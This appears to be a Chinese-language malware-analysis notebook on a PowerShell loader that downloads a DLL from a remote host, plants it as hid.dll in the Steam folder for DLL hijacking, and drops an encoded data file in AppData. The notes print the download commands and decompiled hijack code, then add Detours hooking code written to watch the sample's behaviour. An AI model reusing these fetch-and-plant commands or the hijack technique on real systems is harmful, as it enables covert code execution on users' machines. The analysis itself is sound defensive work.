irm steam.work | echo删除之前的残留文件,然后从 http://1.steam.work/api/integral/pwsDownFile 下载两个文件,dll 放在 steam 目录下命名为 hid.dll ,vdf 文件放在 local 的 Appdata 里的 steam 路径下,命名为 localData.vdf
irm -Uri $downApi -Headers @{ Referer = "libary" } -OutFile $d -ErrorAction Stop
$newFilePath = [System.IO.Path]::ChangeExtension($d, ".dll")
Rename-Item -Path $d -NewName $newFilePath
Write-Host "[Result->1 OK]" -ForegroundColor:green
$d = $localPath + "/localData.vdf"
irm -Uri $downApi -Headers @{ Referer = "localData.vdf" } -OutFile $d -ErrorAction Stop
Write-Host "[Result->2 OK]" -ForegroundColor:green
Start-Sleep 1
Start steam://
$TextShow = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("W+i/nuaOpeacjeWZqOaIkOWKn+WcqFN0ZWFt5YWl5r+A5rS7IDPnp5LlkI7oh6pd"))
Write-Host "$TextShow" -ForegroundColor:green
Start-Sleep 3$downApi = "http://1.steam.work/api/integral/pwsDownFile"
$dllPath = "E:\CTF\steam_dll\downloaded.dll"
Invoke-RestMethod -Uri $downApi -Headers @{ Referer = "libary" } -OutFile $dllPath
hid.dll,即 Human Interface Device (HID) Dynamic Link Library,是 Windows 操作系统中用于管理人机交互设备(如键盘、鼠标、游戏控制器等)的动态链接库文件。 它负责处理这些设备的输入和输出,确保设备与系统之间的通信顺畅
相当于劫持
BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
CHAR String1[260]; // [esp+0h] [ebp-108h] BYREF
if ( fdwReason == 1 )
{
DisableThreadLibraryCalls(hinstDLL);
if ( GetModuleHandleA("SteamUI.dll") )
{
sub_10001000();
lstrcatA(String1, "C:\\Windows\\System32\\hid.dll");
if ( GetFileAttributesA(String1) != -1 )
{
LABEL_6:
LoadLibraryExA(String1, 0, 8u);
return 1;
}
if ( GetWindowsDirectoryA(String1, 0x104u) )
{
lstrcatA(String1, "\\System32\\hid.dll");
goto LABEL_6;
}
}
}
return 1;
}先调用一个函数,再打开原来的 hid
先获取了之前放在 appdata 里的文件,再逐比特取反(用硬件加速)
if ( size )
{
if ( size < 8 )
goto LABEL_104;
if ( size < 0x40 )
goto LABEL_105;
v11 = (__m128 *)(v8 + 32);
v12 = size & 0x3F;
do
{
v13 = v11[-2];
v10 += 64;
v11 += 4;
v11[-6] = _mm_andnot_ps(v13, (__m128)xmmword_1001D520);
v11[-5] = _mm_andnot_ps(v11[-5], (__m128)xmmword_1001D520);
v11[-4] = _mm_andnot_ps(v11[-4], (__m128)xmmword_1001D520);
v11[-3] = _mm_andnot_ps(v11[-3], (__m128)xmmword_1001D520);
}
while ( v10 < size - v12 );
if ( v12 >= 8 )
{
LABEL_105:
do
{
*(_QWORD *)&v8[v10] = _mm_andnot_ps(
(__m128)_mm_loadl_epi64((const __m128i *)&v8[v10]),
(__m128)xmmword_1001D520).m128_u64[0];
v10 += 8;
}
while ( v10 < (size & 0xFFFFFFF8) );
}
if ( v10 < size )
{
LABEL_104:
do
{
v8[v10] = ~v8[v10]; // bitwise not
++v10;
}
while ( v10 < size );
}
}
https://cloud.tencent.com/developer/article/2337999
后面行为导入 dll 并运行 loadlib 函数
确实搜了一圈发现不好搞脱壳(商用壳)。还是看看后面的动态行为怎么搞搞
通过查看导入表来获取要 hook 的函数
可能会动态加载内核中的 Windows API,所以也要 hook 一些常用的函数
下方代码未验证,形式上参考(TODO)
#include <windows.h>
#include <detours.h>
#include <fstream>
#include <iostream>
std::ofstream logFile("dll_hook_log.txt");
// 原始函数定义
typedef BOOL(WINAPI* VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef int(WINAPI* MessageBoxW_t)(HWND, LPCWSTR, LPCWSTR, UINT);
typedef BOOL(WINAPI* HttpAddRequestHeadersA_t)(HINTERNET, LPCSTR, DWORD, DWORD);
typedef NTSTATUS(WINAPI* BCryptDecrypt_t)(BCRYPT_KEY_HANDLE, PUCHAR, ULONG, VOID*, PUCHAR, ULONG, PUCHAR, ULONG, ULONG*, ULONG);
VirtualProtect_t TrueVirtualProtect = nullptr;
MessageBoxW_t TrueMessageBoxW = nullptr;
HttpAddRequestHeadersA_t TrueHttpAddRequestHeadersA = nullptr;
BCryptDecrypt_t TrueBCryptDecrypt = nullptr;
// Hook 的 VirtualProtect 实现
BOOL WINAPI HookedVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect) {
logFile << "[Hooked] VirtualProtect called!" << std::endl;
logFile << " - Address: " << lpAddress << std::endl;
logFile << " - Size: " << dwSize << std::endl;
logFile << " - New Protect: " << flNewProtect << std::endl;
logFile.flush();
return TrueVirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect);
}
// Hook 的 MessageBoxW 实现
int WINAPI HookedMessageBoxW(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType) {
logFile << "[Hooked] MessageBoxW called!" << std::endl;
logFile << " - Text: " << lpText << std::endl;
logFile << " - Caption: " << lpCaption << std::endl;
logFile.flush();
return TrueMessageBoxW(hWnd, lpText, lpCaption, uType);
}
// Hook 的 HttpAddRequestHeadersA 实现
BOOL WINAPI HookedHttpAddRequestHeadersA(HINTERNET hRequest, LPCSTR lpszHeaders, DWORD dwHeadersLength, DWORD dwModifiers) {
logFile << "[Hooked] HttpAddRequestHeadersA called!" << std::endl;
logFile << " - Headers: " << lpszHeaders << std::endl;
logFile.flush();
return TrueHttpAddRequestHeadersA(hRequest, lpszHeaders, dwHeadersLength, dwModifiers);
}
// Hook 的 BCryptDecrypt 实现
NTSTATUS WINAPI HookedBCryptDecrypt(BCRYPT_KEY_HANDLE hKey, PUCHAR pbInput, ULONG cbInput, VOID* pPaddingInfo, PUCHAR pbIV, ULONG cbIV, PUCHAR pbOutput, ULONG cbOutput, ULONG* pcbResult, ULONG dwFlags) {
logFile << "[Hooked] BCryptDecrypt called!" << std::endl;
logFile << " - Input Data Size: " << cbInput << std::endl;
logFile << " - Flags: " << dwFlags << std::endl;
logFile.flush();
return TrueBCryptDecrypt(hKey, pbInput, cbInput, pPaddingInfo, pbIV, cbIV, pbOutput, cbOutput, pcbResult, dwFlags);
}
// DLL 入口点
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
logFile.open("dll_hook_log.txt", std::ios::out);
logFile << "DLL Hook initialized!" << std::endl;
// Hook VirtualProtect
HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
if (hKernel32) {
TrueVirtualProtect = (VirtualProtect_t)GetProcAddress(hKernel32, "VirtualProtect");
if (TrueVirtualProtect) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)TrueVirtualProtect, HookedVirtualProtect);
DetourTransactionCommit();
}
}
// Hook MessageBoxW
HMODULE hUser32 = GetModuleHandleA("user32.dll");
if (hUser32) {
TrueMessageBoxW = (MessageBoxW_t)GetProcAddress(hUser32, "MessageBoxW");
if (TrueMessageBoxW) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)TrueMessageBoxW, HookedMessageBoxW);
DetourTransactionCommit();
}
}
// Hook HttpAddRequestHeadersA
HMODULE hWinInet = GetModuleHandleA("wininet.dll");
if (hWinInet) {
TrueHttpAddRequestHeadersA = (HttpAddRequestHeadersA_t)GetProcAddress(hWinInet, "HttpAddRequestHeadersA");
if (TrueHttpAddRequestHeadersA) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)TrueHttpAddRequestHeadersA, HookedHttpAddRequestHeadersA);
DetourTransactionCommit();
}
}
// Hook BCryptDecrypt
HMODULE hBcrypt = GetModuleHandleA("bcrypt.dll");
if (hBcrypt) {
TrueBCryptDecrypt = (BCryptDecrypt_t)GetProcAddress(hBcrypt, "BCryptDecrypt");
if (TrueBCryptDecrypt) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)TrueBCryptDecrypt, HookedBCryptDecrypt);
DetourTransactionCommit();
}
}
} else if (ul_reason_for_call == DLL_PROCESS_DETACH) {
// 恢复原始函数
if (TrueVirtualProtect) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)TrueVirtualProtect, HookedVirtualProtect);
DetourTransactionCommit();
}
if (TrueMessageBoxW) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)TrueMessageBoxW, HookedMessageBoxW);
DetourTransactionCommit();
}
if (TrueHttpAddRequestHeadersA) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)TrueHttpAddRequestHeadersA, HookedHttpAddRequestHeadersA);
DetourTransactionCommit();
}
if (TrueBCryptDecrypt) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)TrueBCryptDecrypt, HookedBCryptDecrypt);
DetourTransactionCommit();
}
logFile << "DLL Hook detached!" << std::endl;
logFile.close();
}
return TRUE;
}
hook 之后和 ProcMon 合在一起看行为